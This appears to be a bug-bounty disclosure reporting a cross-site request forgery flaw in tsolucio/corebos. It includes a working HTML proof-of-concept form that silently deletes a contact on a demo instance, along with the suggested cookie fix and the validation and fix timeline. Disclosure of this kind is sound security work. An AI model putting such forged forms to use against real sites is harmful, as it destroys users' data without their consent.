Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Aug 5th 2021

✍️ Description

Attacker able to delete any contact with CSRF attack because there is any CSRF protection for related endpoint.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can delete a contact, this means only with visiting a site a contact will be deleted.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in browser.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here contact with record id 43776 will be deleted after clicking on submit button on PoC.html file.

// PoC.html

<html>
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.corebos.com/index.php">
<input type="hidden" name="&#95;&#95;vt5rftk" value="" />
<input type="hidden" name="allselectedboxes" value="" />
<input type="hidden" name="from&#95;link" value="DetailView" />
<input type="hidden" name="cbfromid" value="43776" />
<input type="hidden" name="module" value="Contacts" />
<input type="hidden" name="record" value="43776" />
<input type="hidden" name="isDuplicate" value="false" />
<input type="hidden" name="action" value="Delete" />
<input type="hidden" name="return&#95;module" value="Contacts" />
<input type="hidden" name="return&#95;id" value="" />
<input type="hidden" name="return&#95;action" value="index" />
<input type="hidden" name="reports&#95;to&#95;id" value="" />
<input type="hidden" name="opportunity&#95;id" value="" />
<input type="hidden" name="parent&#95;id" value="43776" />
<input type="hidden" name="contact&#95;role" value="" />
<input type="hidden" name="task&#95;id" value="" />
<input type="hidden" name="meeting&#95;id" value="" />
<input type="hidden" name="call&#95;id" value="" />
<input type="hidden" name="case&#95;id" value="" />
<input type="hidden" name="new&#95;reports&#95;to&#95;id" value="" />
<input type="hidden" name="email&#95;directing&#95;module" value="" />
<input type="hidden" name="emailids" value="43776&#64;80&#124;" />
<input type="hidden" name="pmodule" value="Contacts" />
<input type="hidden" name="cbcustominfo1" value="" />
<input type="hidden" name="cbcustominfo2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Also for real attacks the submit button can be auto-submit.

💥 Impact

This vulnerability is capable of delete any contact.

Fix

Set SameSite attribute of cookies to Strict. 📍 Location index.php#L1

Occurrences

index.php L1

amammad modified the report

2 years ago

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago

amammad modified the report

2 years ago

Joe Bordes validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Joe Bordes marked this as fixed with commit 42369c 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

amammad modified the report

2 years ago

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago

amammad modified the report

2 years ago

Joe Bordes validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Joe Bordes marked this as fixed with commit 42369c 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation